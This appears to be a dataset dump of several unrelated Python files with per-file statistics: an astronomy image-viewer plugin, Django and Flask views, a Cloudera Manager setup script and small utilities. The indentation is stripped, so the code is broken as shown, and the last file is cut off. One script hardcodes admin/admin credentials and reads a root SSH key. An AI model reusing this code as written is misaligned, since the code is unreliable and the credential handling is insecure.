# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga.qtw.QtHelp import QtGui, QtCore
from ginga.qtw import QtHelp
from ginga.util import iqcalc
from ginga.misc.plugins import PickBase
try:
import matplotlib
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
have_mpl = True
except ImportError:
have_mpl = False
from ginga.qtw import ImageViewCanvasQt
class Pick(PickBase.PickBase):
def __init__(self, fv, fitsimage):
# superclass defines some variables for us, like logger
super(Pick, self).__init__(fv, fitsimage)
self.have_mpl = have_mpl
def build_gui(self, container):
assert iqcalc.have_scipy == True, \
Exception("Please install python-scipy to use this plugin")
self.pickcenter = None
# Splitter is just to provide a way to size the graph
# to a reasonable size
vpaned = QtGui.QSplitter()
vpaned.setOrientation(QtCore.Qt.Vertical)
nb = QtHelp.TabWidget()
nb.setTabPosition(QtGui.QTabWidget.East)
nb.setUsesScrollButtons(True)
self.w.nb1 = nb
vpaned.addWidget(nb)
cm, im = self.fv.cm, self.fv.im
di = ImageViewCanvasQt.ImageViewCanvas(logger=self.logger)
di.set_desired_size(200, 200)
di.enable_autozoom('off')
di.enable_autocuts('off')
di.zoom_to(3, redraw=False)
settings = di.get_settings()
settings.getSetting('zoomlevel').add_callback('set',
self.zoomset, di)
di.set_cmap(cm, redraw=False)
di.set_imap(im, redraw=False)
di.set_callback('none-move', self.detailxy)
di.set_bg(0.4, 0.4, 0.4)
self.pickimage = di
bd = di.get_bindings()
bd.enable_pan(True)
bd.enable_zoom(True)
bd.enable_cuts(True)
iw = di.get_widget()
sp = QtGui.QSizePolicy(QtGui.QSizePolicy.MinimumExpanding,
QtGui.QSizePolicy.MinimumExpanding)
iw.setSizePolicy(sp)
width, height = 200, 200
iw.resize(width, height)
nb.addTab(iw, 'Image')
if have_mpl:
self.w.fig = matplotlib.figure.Figure()
self.w.ax = self.w.fig.add_subplot(111, axisbg='black')
self.w.ax.set_aspect('equal', adjustable='box')
self.w.ax.set_title('Contours')
#self.w.ax.grid(True)
canvas = MyFigureCanvas(self.w.fig)
canvas.setDelegate(self)
#canvas.resize(width, height)
self.w.canvas = canvas
nb.addTab(canvas, u"Contour")
self.w.fig2 = matplotlib.figure.Figure()
self.w.ax2 = self.w.fig2.add_subplot(111, axisbg='white')
#self.w.ax2.set_aspect('equal', adjustable='box')
self.w.ax2.set_ylabel('brightness')
self.w.ax2.set_xlabel('pixels')
self.w.ax2.set_title('FWHM')
self.w.ax.grid(True)
canvas = FigureCanvas(self.w.fig2)
self.w.canvas2 = canvas
nb.addTab(canvas, u"FWHM")
sw = QtGui.QScrollArea()
twidget = QtHelp.VBox()
sp = QtGui.QSizePolicy(QtGui.QSizePolicy.MinimumExpanding,
QtGui.QSizePolicy.Fixed)
twidget.setSizePolicy(sp)
vbox = twidget.layout()
vbox.setContentsMargins(4, 4, 4, 4)
vbox.setSpacing(2)
sw.setWidgetResizable(True)
sw.setWidget(twidget)
msgFont = self.fv.getFont('sansFont', 14)
tw = QtGui.QLabel()
tw.setFont(msgFont)
tw.setWordWrap(True)
self.tw = tw
fr = QtHelp.Frame("Instructions")
fr.layout().addWidget(tw, stretch=1, alignment=QtCore.Qt.AlignTop)
vbox.addWidget(fr, stretch=0, alignment=QtCore.Qt.AlignTop)
fr = QtHelp.Frame("Pick")
nb = QtHelp.TabWidget()
nb.setTabPosition(QtGui.QTabWidget.South)
nb.setUsesScrollButtons(True)
self.w.nb2 = nb
fr.layout().addWidget(nb, stretch=1, alignment=QtCore.Qt.AlignLeft)
vbox.addWidget(fr, stretch=0, alignment=QtCore.Qt.AlignTop)
vbox2 = QtHelp.VBox()
captions = (('Zoom', 'label', 'Contour Zoom', 'label'),
('Object_X', 'label', 'Object_Y', 'label'),
('RA', 'label', 'DEC', 'label'),
('Equinox', 'label', 'Background', 'label'),
('Sky Level', 'label', 'Brightness', 'label'),
('FWHM X', 'label', 'FWHM Y', 'label'),
('FWHM', 'label', 'Star Size', 'label'),
('Sample Area', 'label', 'Default Region', 'button'),
)
w, b = QtHelp.build_info(captions)
self.w.update(b)
b.zoom.setText(self.fv.scale2text(di.get_scale()))
self.wdetail = b
b.default_region.clicked.connect(self.reset_region)
b.default_region.setToolTip("Reset region size to default")
vbox2.addWidget(w, stretch=1)
# Pick field evaluation status
label = QtGui.QLabel()
self.w.eval_status = label
## w.layout().addWidget(label, stretch=0, alignment=QtCore.Qt.AlignLeft)
vbox2.addWidget(label, stretch=0)
# Pick field evaluation progress bar and stop button
hbox = QtHelp.HBox()
pgs = QtGui.QProgressBar()
pgs.setRange(0, 100)
pgs.setTextVisible(True)
self.w.eval_pgs = pgs
hbox.addWidget(pgs, stretch=0)
btn = QtGui.QPushButton("Stop")
btn.clicked.connect(lambda w: self.eval_intr())
btn.setEnabled(False)
self.w.btn_intr_eval = btn
hbox.addWidget(btn, stretch=0)
vbox2.addWidget(hbox, stretch=0)
nb.addTab(vbox2, "Readout")
# Build settings panel
captions = (('Show Candidates', 'checkbutton'),
('Radius', 'xlabel', '@Radius', 'spinfloat'),
('Threshold', 'xlabel', '@Threshold', 'entry'),
('Min FWHM', 'xlabel', '@Min FWHM', 'spinfloat'),
('Max FWHM', 'xlabel', '@Max FWHM', 'spinfloat'),
('Ellipticity', 'xlabel', '@Ellipticity', 'entry'),
('Edge', 'xlabel', '@Edge', 'entry'),
('Max side', 'xlabel', '@Max side', 'spinbutton'),
('Redo Pick', 'button'),
)
w, b = QtHelp.build_info(captions)
self.w.update(b)
b.radius.setToolTip("Radius for peak detection")
b.threshold.setToolTip("Threshold for peak detection (blank=default)")
b.min_fwhm.setToolTip("Minimum FWHM for selection")
b.max_fwhm.setToolTip("Maximum FWHM for selection")
b.ellipticity.setToolTip("Minimum ellipticity for selection")
b.edge.setToolTip("Minimum edge distance for selection")
b.show_candidates.setToolTip("Show all peak candidates")
b.show_candidates.setChecked(self.show_candidates)
b.show_candidates.stateChanged.connect(self.show_candidates_cb)
# radius control
adj = b.radius
adj.setRange(5.0, 200.0)
adj.setSingleStep(1.0)
adj.setValue(self.radius)
def chg_radius(val):
self.radius = val
self.w.xlbl_radius.setText(str(self.radius))
return True
b.xlbl_radius.setText(str(self.radius))
b.radius.valueChanged.connect(chg_radius)
# threshold control
def chg_threshold():
threshold = None
ths = str(self.w.threshold.text()).strip()
if len(ths) > 0:
threshold = float(ths)
self.threshold = threshold
self.w.xlbl_threshold.setText(str(self.threshold))
return True
b.xlbl_threshold.setText(str(self.threshold))
b.threshold.returnPressed.connect(chg_threshold)
# min fwhm
adj = b.min_fwhm
adj.setRange(0.1, 200.0)
adj.setSingleStep(1.0)
adj.setValue(self.min_fwhm)
def chg_min(val):
self.min_fwhm = val
self.w.xlbl_min_fwhm.setText(str(self.min_fwhm))
return True
b.xlbl_min_fwhm.setText(str(self.min_fwhm))
b.min_fwhm.valueChanged.connect(chg_min)
# max fwhm
adj = b.max_fwhm
adj.setRange(0.1, 200.0)
adj.setSingleStep(1.0)
adj.setValue(self.max_fwhm)
def chg_max(val):
self.max_fwhm = val
self.w.xlbl_max_fwhm.setText(str(self.max_fwhm))
return True
b.xlbl_max_fwhm.setText(str(self.max_fwhm))
b.max_fwhm.valueChanged.connect(chg_max)
# Ellipticity control
def chg_ellipticity():
minellipse = None
val = str(self.w.ellipticity.text()).strip()
if len(val) > 0:
minellipse = float(val)
self.min_ellipse = minellipse
self.w.xlbl_ellipticity.setText(str(self.min_ellipse))
return True
b.xlbl_ellipticity.setText(str(self.min_ellipse))
b.ellipticity.returnPressed.connect(chg_ellipticity)
# Edge control
def chg_edgew():
edgew = None
val = str(self.w.edge.text()).strip()
if len(val) > 0:
edgew = float(val)
self.edgew = edgew
self.w.xlbl_edge.setText(str(self.edgew))
return True
b.xlbl_edge.setText(str(self.edgew))
b.edge.returnPressed.connect(chg_edgew)
adj = b.max_side
adj.setRange(5, 10000)
adj.setSingleStep(10)
adj.setValue(self.max_side)
def chg_max_side(val):
self.max_side = val
self.w.xlbl_max_side.setText(str(self.max_side))
return True
b.xlbl_max_side.setText(str(self.max_side))
b.max_side.valueChanged.connect(chg_max_side)
b.redo_pick.clicked.connect(self.redo)
nb.addTab(w, "Settings")
captions = (
('Sky cut', 'button', 'Delta sky', 'entry'),
('Bright cut', 'button', 'Delta bright', 'entry'),
)
w, b = QtHelp.build_info(captions)
self.w.update(b)
b.sky_cut.setToolTip("Set image low cut to Sky Level")
b.delta_sky.setToolTip("Delta to apply to low cut")
b.bright_cut.setToolTip("Set image high cut to Sky Level+Brightness")
b.delta_bright.setToolTip("Delta to apply to high cut")
b.sky_cut.setEnabled(False)
self.w.btn_sky_cut = b.sky_cut
self.w.btn_sky_cut.clicked.connect(self.sky_cut)
self.w.sky_cut_delta = b.delta_sky
b.delta_sky.setText(str(self.delta_sky))
b.bright_cut.setEnabled(False)
self.w.btn_bright_cut = b.bright_cut
self.w.btn_bright_cut.clicked.connect(self.bright_cut)
self.w.bright_cut_delta = b.delta_bright
b.delta_bright.setText(str(self.delta_bright))
nb.addTab(w, "Controls")
vbox3 = QtHelp.VBox()
tw = QtGui.QPlainTextEdit()
self.w.report = tw
tw.setLineWrapMode(QtGui.QPlainTextEdit.NoWrap)
vbox3.addWidget(self.w.report, stretch=1)
self._appendText(tw, self._mkreport_header())
btns = QtHelp.HBox()
layout = btns.layout()
layout.setSpacing(3)
btn = QtGui.QPushButton("Add Pick")
btn.clicked.connect(self.add_pick_cb)
layout.addWidget(btn, stretch=0, alignment=QtCore.Qt.AlignLeft)
btn = QtGui.QCheckBox("Record Picks")
btn.setChecked(self.do_record)
btn.stateChanged.connect(self.record_cb)
layout.addWidget(btn, stretch=0, alignment=QtCore.Qt.AlignLeft)
vbox3.addWidget(btns, stretch=0, alignment=QtCore.Qt.AlignLeft)
nb.addTab(vbox3, "Report")
## vbox4 = QtHelp.VBox()
## tw = QtGui.QPlainTextEdit()
## self.w.correct = tw
## tw.setLineWrapMode(QtGui.QPlainTextEdit.NoWrap)
## self._appendText(tw, "# paste a reference report here")
## vbox4.addWidget(self.w.correct, stretch=1)
## btns = QtHelp.HBox()
## layout = btns.layout()
## layout.setSpacing(3)
## btn = QtGui.QPushButton("Correct WCS")
## btn.clicked.connect(self.correct_wcs)
## layout.addWidget(btn, stretch=0, alignment=QtCore.Qt.AlignLeft)
## vbox4.addWidget(btns, stretch=0, alignment=QtCore.Qt.AlignLeft)
## nb.addTab(vbox4, "Correct")
btns = QtHelp.HBox()
layout = btns.layout()
layout.setSpacing(3)
#btns.set_child_size(15, -1)
btn = QtGui.QPushButton("Close")
btn.clicked.connect(self.close)
layout.addWidget(btn, stretch=0, alignment=QtCore.Qt.AlignLeft)
vbox.addWidget(btns, stretch=0, alignment=QtCore.Qt.AlignLeft)
vpaned.addWidget(sw)
container.addWidget(vpaned, stretch=1)
#vpaned.moveSplitter(260, 1)
def _setText(self, w, text):
w.setText(text)
def _appendText(self, w, text):
w.appendPlainText(text)
def _copyText(self, w):
return w.toPlainText()
def _getText(self, w):
return w.toPlainText()
def _setEnabled(self, w, tf):
w.setEnabled(tf)
def record_cb(self, do_record):
self.do_record = bool(do_record)
def instructions(self):
self.tw.setText("""Left-click to place region. Left-drag to position region. Redraw region with the right mouse button.""")
def update_status(self, text):
self.fv.gui_do(self.w.eval_status.setText, text)
def init_progress(self):
self.w.btn_intr_eval.setEnabled(True)
self.w.eval_pgs.setValue(0)
#self.w.eval_pgs.set_text("%.2f %%" % (0.0))
def update_progress(self, pct):
self.w.eval_pgs.setValue(int(pct * 100.0))
#self.w.eval_pgs.set_text("%.2f %%" % (pct*100.0))
def show_candidates_cb(self, tf):
self.show_candidates = tf
if not self.show_candidates:
# Delete previous peak marks
objs = self.fitsimage.getObjectsByTagpfx('peak')
self.fitsimage.deleteObjects(objs, redraw=True)
def adjust_wcs(self, image, wcs_m, tup):
d_ra, d_dec, d_theta = tup
msg = "Calculated shift: dra, ddec = %f, %f\n" % (
d_ra/3600.0, d_dec/3600.0)
msg += "Calculated rotation: %f deg\n" % (d_theta)
msg += "\nAdjust WCS?"
dialog = QtHelp.Dialog("Adjust WCS",
0,
[['Cancel', 0], ['Ok', 1]],
lambda w, rsp: self.adjust_wcs_cb(w, rsp, image, wcs_m))
box = dialog.get_content_area()
layout = QtGui.QVBoxLayout()
box.setLayout(layout)
layout.addWidget(QtGui.QLabel(msg), stretch=1)
dialog.show()
def adjust_wcs_cb(self, w, rsp, image, wcs_m):
w.close()
if rsp == 0:
return
#image.wcs = wcs_m.wcs
image.update_keywords(wcs_m.hdr)
return True
def plot_scroll(self, event):
delta = event.delta()
direction = None
if delta > 0:
direction = 'up'
elif delta < 0:
direction = 'down'
if direction == 'up':
#delta = 0.9
self.plot_zoomlevel += 1.0
elif direction == 'down':
#delta = 1.1
self.plot_zoomlevel -= 1.0
self.plot_panzoom()
# x1, x2 = self.w.ax.get_xlim()
# y1, y2 = self.w.ax.get_ylim()
# self.w.ax.set_xlim(x1*delta, x2*delta)
# self.w.ax.set_ylim(y1*delta, y2*delta)
# self.w.canvas.draw()
def plot_button_press(self, event):
buttons = event.buttons()
x, y = event.x(), event.y()
button = 0
if buttons & QtCore.Qt.LeftButton:
button |= 0x1
if buttons & QtCore.Qt.MidButton:
button |= 0x2
if buttons & QtCore.Qt.RightButton:
button |= 0x4
self.logger.debug("button down event at %dx%d, button=%x" % (
x, y, button))
self.plot_x, self.plot_y = x, y
return True
def plot_button_release(self, event):
# note: for mouseRelease this needs to be button(), not buttons()!
buttons = event.button()
x, y = event.x(), event.y()
button = self.kbdmouse_mask
if buttons & QtCore.Qt.LeftButton:
button |= 0x1
if buttons & QtCore.Qt.MidButton:
button |= 0x2
if buttons & QtCore.Qt.RightButton:
button |= 0x4
self.logger.debug("button release at %dx%d button=%x" % (x, y, button))
def plot_motion_notify(self, event):
buttons = event.buttons()
x, y = event.x(), event.y()
button = 0
if buttons & QtCore.Qt.LeftButton:
button |= 0x1
if buttons & QtCore.Qt.MidButton:
button |= 0x2
if buttons & QtCore.Qt.RightButton:
button |= 0x4
if button & 0x1:
xdelta = x - self.plot_x
ydelta = y - self.plot_y
self.pan_plot(xdelta, ydelta)
def __str__(self):
return 'pick'
class MyFigureCanvas(FigureCanvas):
def setDelegate(self, delegate):
self.delegate = delegate
def keyPressEvent(self, event):
self.delegate.pan_plot(event)
def mousePressEvent(self, event):
self.delegate.plot_button_press(event)
def mouseReleaseEvent(self, event):
self.delegate.plot_button_release(event)
def mouseMoveEvent(self, event):
self.delegate.plot_motion_notify(event)
def wheelEvent(self, event):
self.delegate.plot_scroll(event)
#END
| 34.401887 | 133 | 0.577744 | 2,193 | 18,233 | 4.69585 | 0.195622 | 0.030588 | 0.021752 | 0.022334 | 0.320451 | 0.26209 | 0.205574 | 0.173529 | 0.129346 | 0.101767 | 0 | 0.015315 | 0.301651 | 18,233 | 529 | 134 | 34.466919 | 0.79345 | 0.091373 | 0 | 0.173228 | 0 | 0.002625 | 0.08396 | 0 | 0 | 0 | 0.001819 | 0 | 0.002625 | 1 | 0.086614 | false | 0 | 0.020997 | 0.007874 | 0.146982 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b723c49946f52cdac915a09e27adab029ad9a35 | 715 | py | Python | django2/simpleDemo/blog/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | null | null | null | django2/simpleDemo/blog/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | 1 | 2020-07-17T09:25:42.000Z | 2020-07-17T09:25:42.000Z | django2/simpleDemo/blog/views.py | Gozeon/code-collections | 7304e2b9c4c91a809125198d22cf40dcbb45a23b | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from .models import Comment
from .forms import CommentForm
def index(request):
comments = Comment.objects.order_by('-create_at')
context = {'comments': comments}
return render(request, 'blog/index.html', context)
def sign(request):
if request.method == 'POST':
form = CommentForm(request.POST)
if form.is_valid():
new_comment = Comment(name = request.POST['name'],
comment=request.POST['comment'])
new_comment.save()
return redirect('index')
else:
form = CommentForm
content = {'form': form}
return render(request, 'blog/sign.html', content) | 28.6 | 66 | 0.622378 | 79 | 715 | 5.56962 | 0.443038 | 0.075 | 0.086364 | 0.104545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258741 | 715 | 25 | 67 | 28.6 | 0.830189 | 0 | 0 | 0 | 0 | 0 | 0.099162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.157895 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b73957f0a22b9435187079c42d5be88539e176e | 2,572 | py | Python | scripts/create_cluster.py | rnrbarbosa/CDPDCTrial | aecff49971ba35b6ec02d04846c1ff891d8bca45 | [
"Apache-2.0"
] | 7 | 2020-08-04T20:09:22.000Z | 2022-01-09T05:05:39.000Z | scripts/create_cluster.py | rnrbarbosa/CDPDCTrial | aecff49971ba35b6ec02d04846c1ff891d8bca45 | [
"Apache-2.0"
] | 1 | 2020-12-09T13:18:45.000Z | 2022-01-08T17:41:39.000Z | scripts/create_cluster.py | rnrbarbosa/CDPDCTrial | aecff49971ba35b6ec02d04846c1ff891d8bca45 | [
"Apache-2.0"
] | 14 | 2020-09-03T14:19:10.000Z | 2022-02-21T20:03:31.000Z | from __future__ import print_function
import cm_client
from cm_client.rest import ApiException
from collections import namedtuple
from pprint import pprint
import json
import time
import sys
def wait(cmd, timeout=None):
SYNCHRONOUS_COMMAND_ID = -1
if cmd.id == SYNCHRONOUS_COMMAND_ID:
return cmd
SLEEP_SECS = 5
if timeout is None:
deadline = None
else:
deadline = time.time() + timeout
try:
cmd_api_instance = cm_client.CommandsResourceApi(api_client)
while True:
cmd = cmd_api_instance.read_command(long(cmd.id))
pprint(cmd)
if not cmd.active:
return cmd
if deadline is not None:
now = time.time()
if deadline < now:
return cmd
else:
time.sleep(min(SLEEP_SECS, deadline - now))
else:
time.sleep(SLEEP_SECS)
except ApiException as e:
print("Exception when calling ClouderaManagerResourceApi->import_cluster_template: %s\n" % e)
cm_client.configuration.username = 'admin'
cm_client.configuration.password = 'admin'
api_client = cm_client.ApiClient("http://cloudera:7180/api/v40")
cm_api = cm_client.ClouderaManagerResourceApi(api_client)
# accept trial licence
# m_api.begin_trial()
# Install CM Agent on host
with open ("/root/myRSAkey", "r") as f:
key = f.read()
instargs = cm_client.ApiHostInstallArguments(
host_names=['YourHostname'],
user_name='root',
private_key=key,
cm_repo_url='https://archive.cloudera.com/cm7/7.1.4/',
java_install_strategy='NONE',
ssh_port=22,
passphrase='')
cmd = cm_api.host_install_command(body=instargs)
wait(cmd)
# create MGMT/CMS
mgmt_api = cm_client.MgmtServiceResourceApi(api_client)
api_service = cm_client.ApiService()
api_service.roles = [cm_client.ApiRole(type='SERVICEMONITOR'),
cm_client.ApiRole(type='HOSTMONITOR'),
cm_client.ApiRole(type='EVENTSERVER'),
cm_client.ApiRole(type='ALERTPUBLISHER')]
mgmt_api.auto_assign_roles() # needed?
mgmt_api.auto_configure() # needed?
mgmt_api.setup_cms(body=api_service)
cmd = mgmt_api.start_command()
wait(cmd)
# create the cluster using the template
with open(sys.argv[1]) as f:
json_str = f.read()
Response = namedtuple("Response", "data")
dst_cluster_template=api_client.deserialize(response=Response(json_str),response_type=cm_client.ApiClusterTemplate)
cmd = cm_api.import_cluster_template(add_repositories=True, body=dst_cluster_template)
wait(cmd)
| 27.956522 | 115 | 0.692846 | 333 | 2,572 | 5.12012 | 0.396396 | 0.070381 | 0.035191 | 0.044575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007349 | 0.206454 | 2,572 | 91 | 116 | 28.263736 | 0.828025 | 0.052488 | 0 | 0.134328 | 0 | 0 | 0.104613 | 0.021417 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0.029851 | 0.149254 | 0 | 0.208955 | 0.059701 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b73b791ebd04c2f9222a3d5b07d99e182af0ec3 | 447 | py | Python | codefestival_2016_final_b.py | hythof/atc | 12cb94ebe693e1f469ce0d982bc2924b586552cd | [
"CC0-1.0"
] | null | null | null | codefestival_2016_final_b.py | hythof/atc | 12cb94ebe693e1f469ce0d982bc2924b586552cd | [
"CC0-1.0"
] | null | null | null | codefestival_2016_final_b.py | hythof/atc | 12cb94ebe693e1f469ce0d982bc2924b586552cd | [
"CC0-1.0"
] | null | null | null | n=int(input())
def findMax(n):
l=0
r=n
while r-l>=2:
m1=l+(r-l)//2
m2=m1+1
s1=(m1+1)*(m1/2)
s2=(m2+1)*(m2/2)
if s2 >= n > s1:
return m2
elif s1 < n:
l=m1
else:
r=m1
return 1
def printLines(n,m):
for i in range(m,-1,-1):
if i<=n:
print(i)
n-=i
if n==0:
break
printLines(n,findMax(n))
| 17.88 | 28 | 0.373602 | 74 | 447 | 2.256757 | 0.364865 | 0.095808 | 0.035928 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112033 | 0.46085 | 447 | 24 | 29 | 18.625 | 0.580913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b7674325078da66bb522f08c9f888feac4e3166 | 483 | py | Python | test/test_pre_flight.py | gregbanks/atlascli | 381966c4a042c3769d14167d5db7b5abb9a7c6e0 | [
"Apache-2.0"
] | null | null | null | test/test_pre_flight.py | gregbanks/atlascli | 381966c4a042c3769d14167d5db7b5abb9a7c6e0 | [
"Apache-2.0"
] | null | null | null | test/test_pre_flight.py | gregbanks/atlascli | 381966c4a042c3769d14167d5db7b5abb9a7c6e0 | [
"Apache-2.0"
] | null | null | null | import unittest
from atlascli.commands import Commands
from atlascli.atlasmap import AtlasMap
class TestPreFlight(unittest.TestCase):
def test_preflight(self):
map = AtlasMap()
map.authenticate()
c = Commands(map)
with self.assertRaises(SystemExit) as e:
c.preflight_cluster_arg("xxxxx")
print(f"raised '{e}'")
a = c.preflight_cluster_arg("demodata")
print(a)
if __name__ == '__main__':
unittest.main()
| 24.15 | 48 | 0.652174 | 55 | 483 | 5.490909 | 0.581818 | 0.07947 | 0.112583 | 0.13245 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242236 | 483 | 19 | 49 | 25.421053 | 0.825137 | 0 | 0 | 0 | 0 | 0 | 0.068323 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.066667 | false | 0 | 0.2 | 0 | 0.333333 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b76d1c0d954a8965e785d0d46268bbbacc88062 | 1,357 | py | Python | idealplanets/environment.py | bnb32/spring_onset | f856e839c38c7eb72c8f6148fa1c82e880925370 | [
"MIT"
] | null | null | null | idealplanets/environment.py | bnb32/spring_onset | f856e839c38c7eb72c8f6148fa1c82e880925370 | [
"MIT"
] | null | null | null | idealplanets/environment.py | bnb32/spring_onset | f856e839c38c7eb72c8f6148fa1c82e880925370 | [
"MIT"
] | null | null | null | import os
USERNAME='bbenton'
PROJECT_CODE='UCOR0044'
MAIN_DIR='/glade/u/home/'+USERNAME+'/spring_onset/'
MY_CESM_DIR=MAIN_DIR+'/my_cesm'
POST_PROC_DIR=MAIN_DIR+'/idealplanets/postprocessing/'
PRE_PROC_DIR=MAIN_DIR+'/idealplanets/preprocessing/'
SCRATCH_DIR='/glade/scratch/'+USERNAME+'/'
CIME_OUTPUT_ROOT=SCRATCH_DIR+'/cases/'
CESM_DATA_DIR=SCRATCH_DIR+'/cesm_data/'
CESM_SCRIPTS=MY_CESM_DIR+'/cime/scripts/'
CESM_CAM_OUT_DIR=SCRATCH_DIR+'/archive/%s/atm/hist/'
ORIG_DATA_DIR='/glade/p/cesmdata/cseg/inputdata/'
ORIG_TOPO_DIR=ORIG_DATA_DIR+'/atm/cam/topo/'
ORIG_TREF_DIR=MAIN_DIR+'/trefread/NCL/output/'
ORIG_SST_DIR=ORIG_DATA_DIR+'/ocn/docn7/AQUAPLANET/'
#ORIG_SST_DIR="%s/atm/cam/sst/"%(ORIG_DATA_DIR)
#ORIG_TOPO_FILE="%s/USGS-gtopo30_0.9x1.25_remap_c051027.nc"%(ORIG_TOPO_DIR)
ORIG_TOPO_FILE=ORIG_TOPO_DIR+'/USGS-gtopo30_64x128_c050520.nc'
ORIG_TREF_FILE=ORIG_TREF_DIR+'/tref_T85L30.nc'
ORIG_SST_FILE=ORIG_SST_DIR+'/sst_c4aquasom_0.9x1.25_clim.c170512.nc'
#ORIG_SST_FILE="%s/sst_HadOIBl_bc_64x128_clim_c110526.nc"%(ORIG_SST_DIR)
BASE_SST_FILE='aqua_sst.nc'
BASE_TOPO_FILE='drycore_topo.nc'
BASE_TREF_FILE='drycore_tref.nc'
#AQUA_RES="T42_T42_mg17"
AQUA_RES="f09_f09_mg17"
AQUA_COMPSET="QPC6"
#DRYCORE_RES="T42z30_T42_mg17"
DRYCORE_RES="T85z30_T85_mg17"
#DRYCORE_RES="f09z30_f09_mg17"
DRYCORE_COMPSET="FHS94"
os.environ["PATH"]+=":%s"%env.CESM_SCRIPTS
| 37.694444 | 75 | 0.812822 | 234 | 1,357 | 4.260684 | 0.354701 | 0.042126 | 0.04012 | 0.028084 | 0.052156 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073485 | 0.027266 | 1,357 | 35 | 76 | 38.771429 | 0.681818 | 0.201179 | 0 | 0 | 0 | 0 | 0.404453 | 0.207792 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.037037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b77172878c48e201c7ca6f3a1acef26fd66d49d | 5,316 | py | Python | app/services/routes/service.py | codepointtku/viuhka-flask | e51382a306675efabebe2a47d0ae54b7abcdb884 | [
"MIT"
] | null | null | null | app/services/routes/service.py | codepointtku/viuhka-flask | e51382a306675efabebe2a47d0ae54b7abcdb884 | [
"MIT"
] | 1 | 2021-06-02T00:32:26.000Z | 2021-06-02T00:32:26.000Z | app/services/routes/service.py | codepointtku/viuhka-flask | e51382a306675efabebe2a47d0ae54b7abcdb884 | [
"MIT"
] | 1 | 2019-11-29T05:46:59.000Z | 2019-11-29T05:46:59.000Z | from flask import Blueprint, render_template, request, redirect, Response, url_for
from flask_login import login_required, current_user
from flask_wtf.csrf import validate_csrf
from app.services.models.service import ( Service, get_services, find_service,
amount, create_new, paginate_service_owner_id )
from app.services.forms.service import ServiceForm
from app.services.models.category import get_category, sequalized_categories
from app.utils import root, join, exit, paginate
from wtforms.fields.simple import TextAreaField
import json
import pickle
module = Blueprint('service', __name__)
_name_ = 'Services'
@module.route('/service/list', methods=['GET'])
def list_service():
page = request.args.get('page', 1, int)
if current_user.rank().level < 2:
services = paginate_service_owner_id(current_user.id, page=page, per_page=25)
else:
services = paginate(Service.query, page=page, per_page=25)
return render_template('splash/actions/services/list.html', services=services, amount=amount, current_page=page)
@module.route('/admin/service', methods=['GET', 'POST'])
@login_required
def service():
_type = str(request.args.get('type'))
id = request.args.get('id')
if _type == 'edit':
if request.method == 'GET':
if id == 0:
return redirect(url_for('service.services'))
service = find_service(id)
if service:
form = ServiceForm()
try:
form.category_items.process_data([v for v in service.category_items.values()])
except:
form.category_items.process_data([] if service.category_items is None else service.category_items)
for ff in form.__dict__:
for sf in service.__dict__:
if ff == sf:
if isinstance(form.__dict__[ff], TextAreaField):
form.__dict__[ff].process_data(service.__dict__[sf])
try:
if service.start: form.start.data = str(service.start).replace(' ','T')
if service.end: form.end.data = str(service.end).replace(' ','T')
except:
pass
return render_template('admin/pages/services/_edit.html', service=service, form=form, categories=sequalized_categories)
return render_template('admin/pages/404.html', reason='Service', content='Not found')
else:
form = ServiceForm(request.form)
service = find_service(id)
